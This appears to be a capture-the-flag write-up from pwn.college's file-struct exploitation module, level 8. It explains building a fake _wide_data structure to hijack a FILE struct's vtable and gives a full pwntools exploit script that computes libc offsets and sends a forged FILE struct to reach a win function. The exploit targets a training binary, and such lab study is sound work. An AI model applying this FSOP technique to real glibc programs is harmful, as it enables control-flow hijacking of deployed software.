Post

(File Struct Exploits) level 8

Posted
By hackeringtrue
1 min read
(File Struct Exploits) level 8

Information

  • category: pwn

Description

Create a fake _wide_data struct to hijack control of the virtual function table of a FILE struct.

Write-up

Since when program jump into __GI__IO_dallocbuff is get address of [wide_data + 0xe0] which will get what this address points for and grep this value then make again for this value [value + 0x68] and see what this address points for then get it and make call forThisAddress so is too easy just after fp add address of buff then in fp.chain make it points to address of win and it’s will do the following steps: 1- [rdi+0xe0] –> rdi is wide_data if we make fp.wide_data = buff 2- [buff+0xe0] –> which is address of buff 3- [buff + 0x68] –> which is addres of win on chain var 4- call win 5- good luck in pwner hmmm.(:_:)

Explit

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35

from pwn import *

elf = context.binary = ELF("/challenge/babyfile_level8")
global p
p = elf.process()


def exploit():
    p.recvuntil(b"libc is: ")
    puts = int(p.recvline()[:-1],16)

    p.recvuntil(b"writing to: ")
    buff = int(p.recvline()[:-1],16)

    libc = puts - 0x84420
    _IO_wfile_overflow = libc + 0x1E8DC0
    wide_data = buff
    
    fp = FileStructure()
    fp._lock = buff
    fp.chain = elf.sym['win']
    fp._wide_data = wide_data
    fp.vtable = _IO_wfile_overflow
    fp = bytes(fp) + p64(buff)

    raw_input("DEBUG")
    p.send(fp)

    p.interactive()

def main():
    exploit()

if __name__ == "__main__":
    main()
pwn.college, File-Struct-Exploits
pwn.college FSOP vtable overlaping-vtable
This post is licensed under CC BY 4.0 by the author.